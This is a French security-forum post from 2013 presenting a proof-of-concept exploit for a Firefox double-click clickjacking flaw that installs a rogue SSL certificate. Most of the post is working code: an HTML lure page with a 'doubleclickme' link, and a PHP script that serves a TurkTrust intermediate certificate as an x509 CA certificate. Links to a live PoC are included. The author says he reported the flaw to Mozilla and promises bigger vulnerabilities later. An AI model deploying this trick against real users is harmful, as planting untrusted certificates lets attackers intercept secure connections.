• STATISTIQUES
  • Il y a eu un total de 0 membres et 24184 visiteurs sur le site dans les dernières 24h pour un total de 24 184 personnes!
    Membres: 2 606
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Exploit-db
    Une base de données d'exploits triés par genre (GHDB, Remote, Local, Web, DOS, ShellCode) à ...
    Vulnérabilités
    [FR] Root-me
    Script: 5, Système: 20, Cracking: 16, Cryptanalyse: 17, Programmation: 8, Réaliste: 11, Réseau: 10, Stéganog...
    Challenges
    [EN] Reddit
    Subreddit dédié à la sécurité informatique.
    Hacking
    [EN] Dare your mind
    JavaScript: 6, Crypto: 44, Stegano: 36, Logic: 13, Special: 27, Science: 11, Realistic: 7, Programming: 10, Crack It: 6,...
    Challenges
    [EN] Packet Storm
    Packet Storm est un site qui combine nouvelles de la sécurité informatique, téléchargemen...
    Vulnérabilités
    [EN] social-engineer
    Site dédié au Social Engineering en général.
    Hacking
    [FR] Infomirmo
    Challenge présenté sous la forme de 6 niveaux de difficultés diverses et variées avec chacun plusieurs chall...
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Mozilla Firefox Install malicious certificate clickjacking
01-09-2013, 13h49 (Modification du message : 01-09-2013, 13h49 par j0-c.)
Message : #1
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
Mozilla Firefox Install malicious certificate clickjacking
Video youtube du PoC en action =>

Voila je poste ici une petite vulnérabilité que j'ai dèja signalé sur bugzilla.mozilla.org unpeu plus importante que la dernière, celle ci permet d'installé un certificat SSL et donc même si celui ci est factice ou obsolète, il permet de visiter des site web sécurisé via le même type de certificat.

Le clickjacking consiste a double cliquer sur un lien , au premier clique une boite d'installation de certificat apparaitra et au deuxième clique le certificat sera installé.


Pour l'instant je poste juste des petites failles pour tester la fiabilité du forum , voir si il n'y a pas de personne qui publie ceci à leur nom sur divers autres sites mais si la confiance se fait je vais alors pouvoir vous donner d'avantage de vulnérabilité beaucoup plus importante .
Code PHP :
<!doctype html>
<
html lang="fr">
<
head>
    <
meta charset="utf-8">
    <
title>0day</title>
    <
style media="screen">

    
/* IMPORTANT */
    
html {
        
height100%;
    }
    
body {
        
height100%;
        
margin0;
        
padding0;
    }
    
#page-table {
        
height100%;
        
width100%;
        
border-collapsecollapse;
        
text-aligncenter;
    }
    
#page-td {
        
height100%;
        
padding0;
        
vertical-alignmiddle;
    }
    
div#global {
        
width500px;
        
margin20px auto;
        
text-alignleft;
    }

    
/* COSM�TIQUE */
    
body {
        
backgroundblack;
    }
    
#page-table {
        
backgroundblack;
        
colorwhite;
    }
    
#page-table a {color: white;}
    
div#global {
        
padding10px 20px;
        
backgroundblack;
        
border1px solid black;
        
font-familyArialHelveticasans-serif;
    }


    </
style>
</
head>

<
body>
<
div id="layer1" style="width:442px; height:200px; position:absolute; left:10px; top:56px; z-index:1;">
    <
p><font color="lime">0day exploit double-click-jacking install malicious 
    SSL Certificate
</font></p>
</
div>
<
table id="page-table"><tr><td id="page-td">

<
div id="global">
<
table style="border-collapse:collapse;" cellspacing="0" width="424">
            <
tr>
                <
td width="150" height="119" style="border-width:0; border-color:black; border-style:solid;">
                    <
p>&nbsp;</p>
                </
td>
            </
tr>
            <
tr>
                <
td width="150" height="23" style="border-width:0; border-color:black; border-style:solid;">
                    <
p align="right"><a onmousedown="document.location='./156.php';" href="#"><span style="font-size:8pt;">doubleclickme</span></a></td>
            </
tr>
        </
table>
</
div><!--#global-->

</td></tr></table><!--#page-table-->

</body>
</
html

---
156.php
Code PHP :
<?php
Header
("Content-type: application/x-x509-ca-cert"); //no comment
Header("Content-Disposition: inline; filename=turktrust-intermediate-2.pem"); 
readfile("turktrust-intermediate-2.pem"); 
?>

---
turktrust-intermediate-2.pem
certificate : http://alternativ-testing.fr/Research/Mo...iate-2.pem


Live PoC : http://alternativ-testing.fr/Research/Mo...icate2.htm#
+1 (0) -1 (0) Répondre


Messages dans ce sujet
Mozilla Firefox Install malicious certificate clickjacking - par j0-c - 01-09-2013, 13h49

Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  firefox >= 24 & TLS 1.2 gruik 6 597 07-02-2014, 00h19
Dernier message: Serphentas
  Mozilla Firefox low spoofing possible url spoofing with copy , past and go of a link j0-c 8 829 01-09-2013, 13h54
Dernier message: gruik

Atteindre :


Utilisateur(s) parcourant ce sujet : 3 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut